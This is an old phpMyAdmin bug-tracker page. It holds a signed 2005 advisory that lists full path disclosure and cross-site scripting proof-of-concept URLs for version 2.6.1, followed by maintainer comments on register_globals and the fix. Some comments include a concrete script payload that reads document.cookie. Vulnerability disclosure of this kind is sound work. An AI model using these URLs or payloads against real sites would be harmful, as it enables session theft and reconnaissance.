phpMyAdmin

Tracker: Bugs

1 (in 2.6.1-pl1) Possible XSS Attacks - ID: 1149383

Last Update: Settings changed ( rabus )

Details:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]

Author: cXIb8O3
Date: 22.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Full Path Disclosure ---
1.0
http://[HOST]/[DIR]/libraries/sqlvalidator.lib.php?cfg[SQLValidator][use]=c
XIb8O3
Error message :
- ---------------
Warning: main(./libraries/sqlvalidator.class.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

Fatal error: main() [function.require]: Failed opening
required './libraries/sqlvalidator.class.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

1.1
http://[HOST]/[DIR]/libraries/sqlparser.lib.php

Error message :
- ---------------
Warning: main(./libraries/string.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46

Fatal error: main() [function.require]: Failed opening
required './libraries/string.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
- ---------------

1.2
http://[HOST]/[DIR]/libraries/select_theme.lib.php

Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
- ---------------

1.3
http://[HOST]/[DIR]/libraries/select_lang.lib.php

Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
- ---------------

1.4
http://[HOST]/[DIR]/libraries/relation_cleanup.lib.php

Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
- ---------------

1.5
http://[HOST]/[DIR]/libraries/header_meta_style.inc.php

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/header_meta_style.inc.php
on line 9
- ---------------

1.6
http://[HOST]/[DIR]/libraries/get_foreign.lib.php?foreigners=cXIb8O3&field=
hi&foreigners[hi]=unloved

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_countRecords() in
/www/phpMyAdmin-2.6.1/libraries/get_foreign.lib.php on
line 28
- ---------------

1.7
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=lef
t&del_url=Smutno&is_display[del_lnk]=Mi

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_linkOrButton() in
/www/phpMyAdmin-2.6.1/libraries/display_tbl_links.lib.php
on line 28
- ---------------

1.8
http://[HOST]/[DIR]/libraries/display_export.lib.php

Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
- ---------------

1.9
http://[HOST]/[DIR]/libraries/db_table_exists.lib.php

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_sendHeaderLocation() in
/www/phpMyAdmin-2.6.1/libraries/db_table_exists.lib.php
on line 16
- ---------------

1.10
http://[HOST]/[DIR]/libraries/charset_conversion.lib.php?cfg[AllowAnywhereR
ecoding]=smutno&allow_recoding=mi

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/charset_conversion.lib.php
on line 42
- ---------------

1.11
http://[HOST]/[DIR]/libraries/fpdf/ufpdf.php

Error message :
- ---------------
Warning: main(./libraries/fpdf/fpdf.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Warning: main() [function.include]: Failed opening
'./libraries/fpdf/fpdf.php' for inclusion
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Fatal error: Class 'FPDF' not found in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 20
- ---------------

1.12
http://[HOST]/[DIR]/libraries/dbi/mysqli.dbi.lib.php

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbi/mysqli.dbi.lib.php
on line 13
- ---------------

1.13
http://[HOST]/[DIR]/libraries/dbg/setup.php?GLOBALS[cfg][DBG][enable]=cXIb

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbg/setup.php on line 10
- ---------------

1.14
http://[HOST]/[DIR]/libraries/auth/cookie.auth.lib.php?coming_from_common=c
XIb8O3

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/auth/cookie.auth.lib.php
on line 17
- ---------------

- --- 2. XSS aka Cross Site Scripting ---

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code
]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=lef
t&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=lef
t&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_f
ont_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_fami
ly=[XSS]
and more in this file.

- --- 3. How to fix ---

Download the new version of the script or update.

- --- 4. Greets ---

sp3x and ladyBMS

- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCG5UVznmvyJCR4zQRAjWPAJ426XMVICiyHa8uWL0bkuTaXbeMNACdFRzq
BrQu2PRFI/Myhw5gg8rGW9s=
=miO8
-----END PGP SIGNATURE-----

i am waiting for a paches...

Submitted:

Maksymilian Arciemowicz ( cxib8o3 ) - 2005-02-22 21:06

Priority:

Status:

Closed

Resolution:

Fixed

Assigned:

Alexander M. Turek

Category:

Security / Restrictions

Group:

2.6.1

Visibility:

Public

Comments ( 15 )

Date: 2005-02-23 21:15 Sender: cxib8o3 Logged In: YES user_id=1225357 Ok... [:
Date: 2005-02-23 19:41 Sender: cxib8o3 Logged In: YES user_id=1225357 Ok... [:
Date: 2005-02-23 19:05 Sender: rabus Logged In: YES user_id=418833 Sure you can, at least if you are using the Apache Webserver: echo "php_flag register_globals off" >> /path/to/phpMyAdmin/.htaccess If not, there is probably a way to change php settings on a per-directory basis in other webservers too. Working around register_globals injections is almost impossible for a project of our size. We will try to fix this as far as possible with upcoming releases, but we can never guarantee that you are fully protected against such exploits. Securing php against them is mainly your task, not ours. Sorry. :-/
Date: 2005-02-23 18:47 Sender: cxib8o3 Logged In: YES user_id=1225357 ok so.. if register_globals=Off css`s non exist but if register_globals=On can i make xss attack. For example If i have www in server X where register_globals=On and phpmyadmin in my www, i nothing can do it. Better remove this xss from phpmyadmin. ;]
Date: 2005-02-23 18:05 Sender: rabus Logged In: YES user_id=418833 Marc, this is mainly why it is possible to trigger this setting on a per-directory basis. Enabling register_globals in php.ini is dangerous and getting phpMyAdmin to detect harmful variable injections is not that trivial right now.
Date: 2005-02-23 17:44 Sender: lem9 Logged In: YES user_id=210714 Yes I have register_globals set to On; you see, here many scripts are running, which depend on this setting .... And I'm probably not the only one. We have PMA_sanitize() which can take care of this. However, I should put it into another include and call it from the top of each script: much work in perspective.
Date: 2005-02-23 16:46 Sender: rabus Logged In: YES user_id=418833 Michal is right. With register_globals set to off, the should not be possible anymore: http://rabus.phpmyadmin.net/demos/CVS_LATEST/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E If register_globals is on, it is almost impossible to avoid such problems.
Date: 2005-02-23 16:37 Sender: nijel Logged In: YES user_id=192186 Marc: you have register_globals on ;-)
Date: 2005-02-23 16:33 Sender: lem9 Logged In: YES user_id=210714 Alexander, for 2.0, I am able to reproduce, with PMA 2.6.1, using /libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E It happens also with current cvs HEAD (grab_globals.lib.php 2.8)
Date: 2005-02-23 16:24 Sender: nijel Logged In: YES user_id=192186 Maksymilian: When you sign messages using pgp, you should publish public key on keyserver, otherwise it doesn't make much sense. rabus: I can reproduce it only with register_globals on. But its really hard to make there valid javascript when magic_quotes_gpc is enabled (what is default).
Date: 2005-02-23 16:10 Sender: rabus Logged In: YES user_id=418833 Michal, when the script is called directly, the headers that declare the code to be CSS are not sent. The browser would expect HTML code, so you could inject harmful JS code here. Were you able to reproduce the exploits?
Date: 2005-02-23 15:59 Sender: nijel Logged In: YES user_id=192186 Ad 2.1: I suggest making content of that file function and call it with all neded params instead of including. Ad 2.2 and 2.3: I can't find anything dangerous in modifying CSS.
Date: 2005-02-23 14:52 Sender: rabus Logged In: YES user_id=418833 OK, let's do this. :-) 2.0: With grab_globals.lib.php, rev. 2.8 (attached to bug #1149381), I cannot reproduce these exploits anymore. 2.1, 2.2 and 2.3: These exploits require "register_globals" to be enabled in php.ini. This setting is considered to be very dangerous and therefor disabled by default since php 4.2.0. http://de3.php.net/register_globals Maksymilian, is there any XSS attack you can see with my latest patch and register_globals = Off? If not, I'd like to mark this bug as fixed, too.
Date: 2005-02-23 08:28 Sender: cxib8o3 Logged In: YES user_id=1225357 Ok.. so path disclosure is non critical etc.. but XSS..
Date: 2005-02-22 22:29 Sender: rabus Logged In: YES user_id=418833 Maksymilian, thank you for your report. First of all, please do not submit two different issues with one bug report. The first issue (path disclosure) was already reported to us and we are currently dealing with it. Please note, that you can only exploit it if the php setting "display_errors" is set to 1. The php manual advices to disable this feature on productional systems. http://de2.php.net/manual/en/ref.errorfunc.php#ini.display-errors Thank you, Alexander M. Turek

Attached File

Changes ( 11 )

Field	Old Value	Date	By
close_date	-	2005-02-27 11:24	rabus
status_id	Open	2005-02-27 11:24	rabus
resolution_id	Accepted	2005-02-23 19:05	rabus
priority	9	2005-02-23 19:05	rabus
summary	(2.6.1) Full Path Disclosure and XSS	2005-02-23 19:05	rabus
assigned_to	nobody	2005-02-23 14:52	rabus
resolution_id	None	2005-02-23 14:52	rabus
category_id	None	2005-02-23 14:52	rabus
artifact_group_id	None	2005-02-23 14:52	rabus
priority	5	2005-02-23 14:52	rabus
summary	[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]	2005-02-22 22:29	rabus

phpMyAdmin

Tracker: Bugs

Comments ( 15 )

Attached File

No Files Currently Attached

Changes ( 11 )

About SourceForge

Find Software

Develop Software

Community

Help